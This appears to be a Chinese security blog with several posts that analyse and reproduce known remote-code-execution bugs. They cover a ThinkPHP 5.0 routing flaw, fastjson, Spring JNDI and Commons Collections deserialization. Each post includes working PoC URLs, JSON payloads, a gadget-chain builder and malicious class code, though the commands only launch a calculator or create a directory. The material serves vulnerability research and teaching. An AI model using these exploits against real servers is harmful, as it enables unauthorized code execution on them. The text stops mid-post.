thinkphp5.0 RCE分析

Posted on 2019-03-07 | In web , CTF , 技术学习

Thinkphp5.0 RCE分析

迟到的关于年末爆出的tp5的RCE的分析文章。

我们先来分析以下的poc

1	?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

分析一个MVC的框架首先最重要的一步就是要搞清楚这个框架的路由规则。我们从index.php开始，

1
2
3

define('APP_PATH', __DIR__ . '/../application/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php';

直接require了./../thinkphp/start.php,跟入该文件

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

namespace think;

// ThinkPHP 引导文件
// 1. 加载基础文件
require __DIR__ . '/base.php';

// 2. 执行应用
App::run()->send();

进入App.php的run()方法，该方法的实现主要步骤可简化为:

    public static function run(Request $request = null)
    {
        $request = is_null($request) ? Request::instance() : $request;

        try {
            /*
          ...
              */
            $dispatch = self::$dispatch;

            // 未设置调度信息则进行 URL 路由检测
            if (empty($dispatch)) {
                $dispatch = self::routeCheck($request, $config);
            }
/*
           ...
*/               
            $data = self::exec($dispatch, $config);
        } catch (HttpResponseException $exception) {
            $data = $exception->getResponse();
        }
/*
...
*/
        return $response;
    }

路由检测位于routeCheck($request,$config)中，跟入该函数

public static function routeCheck($request, array $config)
    {
        $path   = $request->path();
        $depr   = $config['pathinfo_depr'];
        $result = false;

        // 路由检测
       ...

            // 路由检测（根据路由定义返回不同的URL调度）
            $result = Route::check($request, $path, $depr, $config['url_domain_deploy']);
            $must   = !is_null(self::$routeMust) ? self::$routeMust : $config['url_route_must'];

            if ($must && false === $result) {
                // 路由无效
                throw new RouteNotFoundException();
            }
        }

        // 路由无效 解析模块/控制器/操作/参数... 支持控制器自动搜索
        if (false === $result) {
            $result = Route::parseUrl($path, $depr, $config['controller_auto_search']);
        }

        return $result;
    }

routeCheck函数中首先通过$request->path()获取了请求的path，跟进可知该值在允许兼容模式时可以通过$_GET[Config::get('var_pathinfo')]获取，默认情况下即$_GET[s],因此我们的poc获取到的path即为index/\think\app/invokefunction。之后由于路由规则中并无此规则，则进入控制器自动搜索,即Route::parseUrl($path, $depr, $config['controller_auto_search']);

跟进parseUrl可知thinkphp在处理路由时会用/分割path,对应分割结果分别匹配为模块|控制器|操作|操作参数,

因此最后获取到的路由为

50ECD0B6-F5D3-4829-9D3C-0F2B1741CE81

回到App.php中,

1	$data = self::exec($dispatch, $config);

这行操作是整个RCE实现的关键。我们跟入exec方法的实现

protected static function exec($dispatch, $config)
    {
        switch ($dispatch['type']) {
           ...
            case 'module': // 模块/控制器/操作
                $data = self::module(
                    $dispatch['module'],
                    $config,
                    isset($dispatch['convert']) ? $dispatch['convert'] : null
                );
                break;
           ...
        }

        return $data;
    }

跟入module方法

public static function module($result, $config, $convert = null)
    {
        if (is_string($result)) {
            $result = explode('/', $result);
        }

        $request = Request::instance();

       ...

        // 获取控制器名
        $controller = strip_tags($result[1] ?: $config['default_controller']);
        $controller = $convert ? strtolower($controller) : $controller;

        // 获取操作名
        $actionName = strip_tags($result[2] ?: $config['default_action']);
       ...

        try {
            $instance = Loader::controller(
                $controller,
                $config['url_controller_layer'],
                $config['controller_suffix'],
                $config['empty_controller']
            );
        } catch (ClassNotFoundException $e) {
            throw new HttpException(404, 'controller not exists:' . $e->getClass());
        }

进入Loader::controller方法

public static function controller($name, $layer = 'controller', $appendSuffix = false, $empty = '')
    {
        list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix);

        if (class_exists($class)) {
            return App::invokeClass($class);
        }

        if ($empty) {
            $emptyClass = self::parseClass($module, $layer, $empty, $appendSuffix);

            if (class_exists($emptyClass)) {
                return new $emptyClass(Request::instance());
            }
        }

        throw new ClassNotFoundException('class not exists:' . $class, $class);
    }

跟入App::invokeClass方法，

public static function invokeClass($class, $vars = [])
{
    $reflect     = new \ReflectionClass($class);
    $constructor = $reflect->getConstructor();
    $args        = $constructor ? self::bindParams($constructor, $vars) : [];

    return $reflect->newInstanceArgs($args);
}

该方法使用php的反射机制返回指定类的一个对象，因此由我们的poc,Loader::controller返回了\think\app类的一个实例。

继续回到App::module方法

$action = $actionName . $config['action_suffix'];

      $vars = [];
      if (is_callable([$instance, $action])) {
          // 执行操作方法
          $call = [$instance, $action];
          // 严格获取当前操作方法名
          $reflect    = new \ReflectionMethod($instance, $action);
          $methodName = $reflect->getName();
          $suffix     = $config['action_suffix'];
          $actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName;
          $request->action($actionName);

      } elseif (is_callable([$instance, '_empty'])) {
          // 空操作
          $call = [$instance, '_empty'];
          $vars = [$actionName];
      } else {
          // 操作不存在
          throw new HttpException(404, 'method not exists:' . get_class($instance) . '->' . $action . '()');
      }

      Hook::listen('action_begin', $call);

      return self::invokeMethod($call, $vars);
  }

可以看到App::module方法之后会判断之前生成的实例是否有对应的方法,存在的话便会设置$call变量为[\think\App类的实例,'invokefunction'],最后调用self::invokeMethod($call,$vars)。跟入该方法

public static function invokeMethod($method, $vars = [])
{
    if (is_array($method)) {
        $class   = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);
        $reflect = new \ReflectionMethod($class, $method[1]);
    } else {
        // 静态方法
        $reflect = new \ReflectionMethod($method);
    }

    $args = self::bindParams($reflect, $vars);

    self::$debug && Log::record('[ RUN ] ' . $reflect->class . '->' . $reflect->name . '[ ' . $reflect->getFileName() . ' ]', 'info');

    return $reflect->invokeArgs(isset($class) ? $class : null, $args);
}

跟入self::bindParams,该方法用于获取最后执行的函数的参数

private static function bindParams($reflect, $vars = [])
{
    // 自动获取请求变量
    if (empty($vars)) {
        $vars = Config::get('url_param_type') ?
        Request::instance()->route() :
        Request::instance()->param();
    }

    $args = [];
    if ($reflect->getNumberOfParameters() > 0) {
        // 判断数组类型 数字数组时按顺序绑定参数
        reset($vars);
        $type = key($vars) === 0 ? 1 : 0;

        foreach ($reflect->getParameters() as $param) {
            $args[] = self::getParamValue($param, $vars, $type);
        }
    }

    return $args;
}

默认情况下Config::get('url_param_type')为0,因此$vars被设置为Request::instance()->param(),在我们的poc中$vars即

1D9D22C4-D7CC-42C1-A409-DDF852FEF696

即为我们的请求参数。之后通过判断$reflect的方法中需要的参数最后返回参数列表$args

39BE1DE5-F2C4-4374-8B77-CCBC3F425C31

回到invokeMethod方法,

1	return $reflect->invokeArgs(isset($class) ? $class : null, $args);

这里调用了$reflect的invokeArgs方法，即通过反射调用/think/App类的invokefunction方法。

public static function invokeFunction($function, $vars = [])
    {
        $reflect = new \ReflectionFunction($function);
        $args    = self::bindParams($reflect, $vars);

        // 记录执行信息
        self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');

        return $reflect->invokeArgs($args);
    }

可以看到最后invokeFunction()相当于直接调用call_user_func_array("phpinfo",[1])

5DD9C4E3-7EC3-49FE-B316-63F18FEDF455

可见整个RCE的原因便是由于thinkphp在获取控制器时过滤不足导致可以任意生成类的实例调用指定的方法而导致的。怎样获取其他的可用的RCE的poc？我们可以在Loader::controller方法中添加一行代码:

1	$t=get_declared_classes();

在这行代码后的代码处下断点调试

7A4DEE2D-287B-4B00-852A-7D593E6308C7

可以看到这些类都是tp中可用的用来RCE的类，我们只需要再多研究便可发现其他的利用链。

修复方法也是很简单粗暴，只需要过滤掉反斜杠即可。

PHPINFO中的敏感信息记录

Posted on 2019-02-28 | Edited on 2019-03-07 | In 技术学习 , CTF

去年滴滴面试的时候提到过phpinfo中有哪些安全相关的信息，当时答的不算很好，今年也要面临校招，所以在这篇文章中总结一下。

Configuration File (php.ini) Path
加载的php.ini文件的位置
Registered PHP Streams
支持的php流，主要用于文件包含、反序列化等等的应用。
Registered Stream Filters
支持的php流过滤器，应用如上。
allow_url_fopen与allow_url_include
文件包含有关
disable_functions
禁止的函数，RCE时需要特别注意
display_errors display_startup_errors
错误提示相关
open_basedir
重要属性，（线下赛中在WAF设置一个可以废掉所有的文件包含漏洞）
enable_dl
是否能够动态加载php模块，可用于bypass disable_functions
extension_dir
模块位置
include_path
php include时的默认路径
short_open_tag
判断服务器是否支持短标签
session.save_path
session存储路径
session.save_handler
用户自定义存储函数
session.auto_start
是否自动开启session
session.serialize_handler
反序列化器
_SERVER相关
fastcgi
远程命令执行、解析漏洞
expose_php
在http包中显示php版本等

fastjson反序列化的两种利用方法的原理剖析

Posted on 2019-02-14 | Edited on 2019-03-22

打包发布于安全客https://www.anquanke.com/post/id/173459

fastjson反序列化的两种利用方法的原理剖析

JdbcRowSetImpl

利用JdbcRowSetImpl的payload如下：

{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://127.0.0.1:3456/Object",
    "autoCommit":true
}

在触发反序列化时会调用JdbcRowSetImpl类的 setAutoCommit函数

public void setAutoCommit(boolean var1) throws SQLException {
        if (this.conn != null) {
            this.conn.setAutoCommit(var1);
        } else {
            this.conn = this.connect();
            this.conn.setAutoCommit(var1);
        }
}

继续跟进connect函数

protected Connection connect() throws SQLException {
        if (this.conn != null) {
            return this.conn;
        } else if (this.getDataSourceName() != null) {
            try {
                InitialContext var1 = new InitialContext();
                DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
                return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection();
            } catch (NamingException var3) {
                throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());
            }
        } else {
            return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null;
        }
}

可以看到当conn为null时会发起JNDI查询从而加载我们的恶意类。

TemplatesImpl

payload如下:

{
    "@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "_bytecodes":["base64编码后的继承于AbstractTranslet类的子类的class文件"],
    '_name':'a.b',
    '_tfactory':{ },
    "_outputProperties":{ },
    "_version":"1.0",
    "allowedProtocols":"all"
}

由于com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类的outputProperties属性类型为Properties因此在反序列化过程中会调用该类的getOutputProperties方法。

public synchronized Properties getOutputProperties() {
    try {
        return newTransformer().getOutputProperties();
    }
    catch (TransformerConfigurationException e) {
        return null;
    }
}

继续跟进newTransformer方法

public synchronized Transformer newTransformer()
        throws TransformerConfigurationException
    {
        TransformerImpl transformer;

        transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);//this line

        if (_uriResolver != null) {
            transformer.setURIResolver(_uriResolver);
        }

        if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
            transformer.setSecureProcessing(true);
        }
        return transformer;
	}

在newTransformer方法中需要实例化一个TransformerImpl类的对象，跟进getTransletInstance()方法

private Translet getTransletInstance()
        throws TransformerConfigurationException {
        try {
            if (_name == null) return null;

            if (_class == null) defineTransletClasses();

            // The translet needs to keep a reference to all its auxiliary
            // class to prevent the GC from collecting them
            AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
            translet.postInitialization();
            translet.setTemplates(this);
            translet.setServicesMechnism(_useServicesMechanism);
            translet.setAllowedProtocols(_accessExternalStylesheet);
            if (_auxClasses != null) {
                translet.setAuxiliaryClasses(_auxClasses);
            }

            return translet;
        }
        catch (InstantiationException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (IllegalAccessException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

跟进defineTransletClasses方法中

private void defineTransletClasses()
        throws TransformerConfigurationException {

        if (_bytecodes == null) {
            //...
        }

        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new Hashtable();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

            if (_transletIndex < 0) {
                ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
                throw new TransformerConfigurationException(err.toString());
            }
        }
        catch (ClassFormatError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (LinkageError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

可以看到该方法将会遍历我们传入的_bytecodes数组，执行loader.defineClass方法，而TransletClassLoader类的defineClass方法如下:

1
2
3

Class defineClass(final byte[] b) {
            return defineClass(null, b, 0, b.length);
        }

可见直接实现于ClassLoader类的defineClass方法。查询jdk1.8的文档

可以看到该方法会将我们传入的编码后的class文件加载入jvm。

而我们的恶意类继承于ABSTRACT_TRANSLET，即com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet，因此便会设置_transletIndex为0。再回到我们的getTransletInstance方法中，

1	AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

生成了一个我们的恶意类的对象实例，因此导致了我们的恶意类中的代码最后被执行。

这里我们使用的恶意类如下:

package JavaUnser;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class ShellExec extends AbstractTranslet{
    public ShellExec() throws IOException{
        Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }
    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        //ShellExec t = new ShellExec();
    }

}

参考资料

https://github.com/imagemlt/JavaUnserializePocs

Spring-jndi 反序列化漏洞分析复现

Posted on 2019-02-11 | Edited on 2019-03-22

打包发布于安全客https://www.anquanke.com/post/id/173459

spring-jndi反序列化

众所周知Spring框架是一款用途广泛影响深远的java框架，因此Spring框架一旦出现漏洞也是影响深远。这次分析的Spring jdni反序列化漏洞主要存在于spring-tx包中，该包中的org.springframeworkl.transation.jta.JtaTransationManager类存在JDNI反序列化的问题，可以加载我们注册的RMI链接，然后将对象发送到有漏洞的服务器从而执行远程命令。首先应当注意本文中成功执行的Poc本人仅在jdk1.7中测试成功，而jdk1.8中未测试成功。

什么是JNDI?

JNDI(Java Naming and Directory Interface)是J2EE中的重要规范之一，是一组在Java应用中访问命名和目录服务的API，使得我们能够通过名称去查询数据源从而访问需要的对象。

这里我们给出在java下的一段提供JNDI服务的代码：

System.out.println("Starting HTTP server");
HttpServer httpServer = HttpServer.create(new InetSocketAddress(8086), 0);
httpServer.createContext("/",new HttpFileHandler());
httpServer.setExecutor(null);
httpServer.start();
			
System.out.println("Creating RMI Registry");
Registry registry = LocateRegistry.createRegistry(1099);
Reference reference = new javax.naming.Reference("ExportObject","ExportObject","http://127.0.01:8086/");
ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);
registry.bind("Object", referenceWrapper);

这里我们创建了一个HTTP服务后又创建了一个RMI服务,并且RMI服务提供了对ExportObject类的查询，这里ExportObject类的源码为：


public class ExportObject {
    public ExportObject() {
        try {
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch(Exception e) {
            e.printStackTrace();
        }
    }

}

其功能便是执行我们验证rce时常用的调用计算器的功能。

要加载ExportObject类我们可以使用以下的代码:

1
2
3

Context ctx=new InitialContext();
ctx.lookup("rmi://127.0.0.1:1099/Object");
//System.out.println("loaded obj");

执行以下代码后可以发现ExportObject类的构造函数被调用，弹出了计算器。

Spring框架中的JNDI反序列化漏洞

导致JNDI反序列化问题的类主要是org.springframework.transaction.jta.JtaTransactionManager类。跟进该类的源码中的readObject()函数:

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        this.jndiTemplate = new JndiTemplate();
        this.initUserTransactionAndTransactionManager();
        this.initTransactionSynchronizationRegistry();
    }

继续跟进initUserTransactionAndTransactionManager()函数

protected void initUserTransactionAndTransactionManager() throws TransactionSystemException {
    if (this.userTransaction == null) {
        if (StringUtils.hasLength(this.userTransactionName)) {
            this.userTransaction = this.lookupUserTransaction(this.userTransactionName);
            this.userTransactionObtainedFromJndi = true;
        } else {
            this.userTransaction = this.retrieveUserTransaction();
            if (this.userTransaction == null && this.autodetectUserTransaction) {
                this.userTransaction = this.findUserTransaction();
            }
        }
    }

继续进一步跟进lookupUserTransaction()函数

protected UserTransaction lookupUserTransaction(String userTransactionName) throws TransactionSystemException {
    try {
        if (this.logger.isDebugEnabled()) {
            this.logger.debug("Retrieving JTA UserTransaction from JNDI location [" + userTransactionName + "]");
        }

        return (UserTransaction)this.getJndiTemplate().lookup(userTransactionName, UserTransaction.class);
    } catch (NamingException var3) {
        throw new TransactionSystemException("JTA UserTransaction is not available at JNDI location [" + userTransactionName + "]", var3);
    }
}

可以看到最终return (UserTransaction)this.getJndiTemplate().lookup(userTransactionName, UserTransaction.class),跟进JndiTemplate类的lookup方法,

public Object lookup(final String name) throws NamingException {
    if (this.logger.isDebugEnabled()) {
        this.logger.debug("Looking up JNDI object with name [" + name + "]");
    }

    return this.execute(new JndiCallback<Object>() {
        public Object doInContext(Context ctx) throws NamingException {
            Object located = ctx.lookup(name);
            if (located == null) {
                throw new NameNotFoundException("JNDI object with [" + name + "] not found: JNDI implementation returned null");
            } else {
                return located;
            }
        }
    });
}

而execute()方法的定义如下

public <T> T execute(JndiCallback<T> contextCallback) throws NamingException {
        Context ctx = this.getContext();

        Object var3;
        try {
            var3 = contextCallback.doInContext(ctx);//此处触发RCE
        } finally {
            this.releaseContext(ctx);
        }

        return var3;
    }

可以看到在整个流程的最后将会查询最开始我们由反序列化传入的org.springframework.transaction.jta.JtaTransactionManager类的对象的userTransactionName属性，最终导致加载了我们恶意的rmi源中的恶意类，从而导致RCE。

Poc

这个漏洞的Poc构造比起之前分析的apache common collections反序列化的Poc构造显然要简单许多：

System.out.println("Connecting to server "+serverAddress+":"+port);
Socket socket=new Socket(serverAddress,port);
System.out.println("Connected to server");
String jndiAddress = "rmi://127.0.0.1:1099/Object";//恶意的rmi注册源
			
org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();
object.setUserTransactionName(jndiAddress);
			
System.out.println("Sending object to server...");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());
objectOutputStream.writeObject(object);
objectOutputStream.flush();

执行后可以发现成功弹出计算器。

参考资料

https://blog.csdn.net/wn084/article/details/80729230

https://github.com/zerothoughts/spring-jndi

java apache common collections 反序列化分析

Posted on 2019-02-06 | Edited on 2019-03-22

打包发布于安全客https://www.anquanke.com/post/id/173459

java apache common collections 反序列化分析

apache common collections是15年左右爆出来的一个反序列化利用链，影响范围广泛。这篇文章中便复现一下这个利用过程。

复现的第一步：项目依赖项配置

新版本的apache common collections添加了对这个漏洞的修复，在apache common collections4中Tranformer类取消了Seralizable,而其他高版本则需要设置环境来允许序列化才可以，因此我们使用旧版本的apache common collections来复现这个漏洞。这里贴一下我的maven的依赖项配置：

 <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.11</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2</version>
    </dependency>
</dependencies>

pop链分析

apache common collections的反序列化主要依托于transformer这个类，以及TransformedMap类。顾名思义Transformer类适用于描述一个变换过程，而TransformedMap就是将这个变换过程应用到一个Map上对Map进行变换。当我们修改Map中的某个值时就会调用预先设置好的Transformer来对Map进行处理操作。

1	Map transformedMap=TransformedMap.decorate(map,keyTrasnfomer,valueTransformer);

这里便通过一个decorate函数将一个map转换为TranformedMap,并对map的key和value绑定相应的Transformer,当key和value改变时便触发对应的Transformer的transform方法进行处理动作。

如果想要实现一连串的变换操作则可以通过ChainedTransformer来实现,比如这里我们用于实现RCE的Tranformer链：

Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                /*
                由于Method类的invoke(Object obj,Object args[])方法的定义
                所以在反射内写new Class[] {Object.class, Object[].class }
                正常POC流程举例：
                ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
                */
                new InvokerTransformer(
                        "getMethod",
                        new Class[] {String.class, Class[].class },
                        new Object[] {"getRuntime", new Class[0] }
                ),
                new InvokerTransformer(
                        "invoke",
                        new Class[] {Object.class,Object[].class },
                        new Object[] {null, null }
                ),
                new InvokerTransformer(
                        "exec",
                        new Class[] {String.class },
                        new Object[] { "/Applications/Calculator.app/Contents/MacOS/Calculator" } //目标机器上反序列化后执行的命令
                )
        };
Transformer chainedTransformer=new ChainedTransformer(transformers);

实际执行的代码便是((Runtime) Runtime.class.getMethod("getRuntime").invoke()).exec("/Applications/Calculator.app/Contents/MacOS/Calculator")

也就是Mac下弹计算器的指令。

之后我们便可以构造一个是哟很难过这个chain的TranformedMap，并且触发对这个TransformedMap的处理即可：

Map map=new HashMap();
map.put("a","b");
Map transformedMap=TransformedMap.decorate(map,null,chainedTransformer);
transformedMap.put("a","z");

执行即可发现弹回的计算器。

F0D6679D-9008-4677-84C4-0B76725033AF

RCE构造

我们已经构造出了执行命令的popChain,那样怎样才能找到一个符合条件的RCE?我们需要找到一个满足下列条件的类:

重写了readObject方法
在readObject方法中存在对一个可控的map进行修改的过程

之前的很多文章都是使用的AnnotationInvocationHandler类,然而在我使用的jdk版本(1.8)中该类的readObject方法中并没有找到对map的更改操作。后来参考反序列化自动化工具ysoserial中的CommonsCollections5这个payload实现了其中的一个调用链：利用BadAttributeValueExpException类。我们可以看一下这个类的readObject方法：

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val= valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString();
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
}

可以看到这里我们对反序列化传入的对象的成员属性val判断其类型，如果这个变量不是String便会调用val的toString方法。这里如果我们通过反序列化传入的val是一个lazyMap类的entry，在调用其toString方法时便会调用LazyMap.get()从而触发绑定的Transformer的transform方法。但是这里我们的LazyMap类在获取一个不存在的键的时候才会触发transform，因此我们这里可以引入另外一个类TiedMapEntry,这个类在执行toString时可以调用其绑定的map取获取预定的键。

因此这个poc链的执行过程为：

BadAtrributeValueException对象exception  ->
exception对象的val设置为lazyMap的TiedMapEntry,键为lazyMap中不存在的键 ->
调用entry的toString() ->
调用lazyMap的get方法获取这个不存在的键 ->
调用transform方法

具体实现：

Transformer chainedTransformer=new ChainedTransformer(transformers);
        /*Map map=new HashMap();
        map.put("a","b");
        Map transformedMap=TransformedMap.decorate(map,null,chainedTransformer);
        transformedMap.put("a","z");
        System.exit(1);*/
Map normalMap=new HashMap();
normalMap.put("hackedby","imagemlt");
Map lazyMap=LazyMap.decorate(normalMap,chainedTransformer);

TiedMapEntry entry=new TiedMapEntry(lazyMap,"foo");

BadAttributeValueExpException exception=new BadAttributeValueExpException(null);
Field valField=exception.getClass().getDeclaredField("val");
valField.setAccessible(true);
valField.set(exception,entry);

File f=new File("/tmp/payload.bin");
ObjectOutputStream out=new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(exception);
out.flush();
out.close();

ObjectInputStream in=new ObjectInputStream(new FileInputStream(f));
in.readObject();

后记

这种利用一个Map的pop链就可以让我们想起php的phar反序列化的分析paper中作者挖掘的wordpress的反序列化漏洞也用到了一个类似的对数组进行操作的iterator类，这种利用遍历操作或者绑定动作的操作也可以作为一种分析反序列化漏洞寻找pop链的思路。

参考文献

https://www.freebuf.com/vuls/175252.html

https://github.com/frohoff/ysoserial

http://pirogue.org/2017/12/22/javaSerialKiller/

fastjson反序列化复现

Posted on 2018-12-25 | Edited on 2019-04-05 | In web , CTF

fastjson反序列化复现

最近复现一些java方面的漏洞，之前护网杯遇到过一次fastjson反序列化利用的题目，于是这里便从在idea中创建一个maven项目开始复现一下fastjson的反序列化漏洞。

fastjson反序列化漏洞的主要影响范围是<=1.2.24版本的fastjson。因此，参考在IDEA中创建maven项目在创建好maven项目之后，编辑pom.xml加入fastjson需要的dependency：

<dependency>
      <groupId>com.alibaba</groupId>
      <artifactId>fastjson</artifactId>
      <version>1.2.24</version>
    </dependency>
    <dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-io</artifactId>
    <version>1.3.2</version>
  </dependency>
    <dependency>
      <groupId>commons-codec</groupId>
      <artifactId>commons-codec</artifactId>
      <version>1.9</version>
    </dependency>

之后首先编辑ShellExec类,这个类也是反序列化的一个目标类

package com.alijsondeser;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class ShellExec extends AbstractTranslet{
    public ShellExec() throws IOException{
        Runtime.getRuntime().exec("mkdir /tmp/imagemlt");
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }
    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        ShellExec t = new ShellExec();
    }

}

然后便是我们的poc类

package com.alijsondeser;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
/**
 * Created by web on 2017/4/29.
 */
public class Poc {
    public static String readClass(String cls){
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }
    public static void  test_autoTypeDeny() throws Exception {
        ParserConfig config = new ParserConfig();
        final String fileSeparator = System.getProperty("file.separator");
        final String evilClassPath = System.getProperty("user.dir") + "/target/classes/com/alijsondeser/ShellExec.class";
        //final String evilClassPath = "/tmp/ShellExec.class";
        String evilCode = readClass(evilClassPath);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }," +
                "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        System.out.println(text1);

        Object obj = JSON.parseObject(text1,Object.class,config,Feature.SupportNonPublicField);
        //assertEquals(Model.class, obj.getClass());
    }
    public static void main(String args[]){
        try {
            test_autoTypeDeny();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

执行poc，查看目录可以看到已经被执行

生成的payload为：

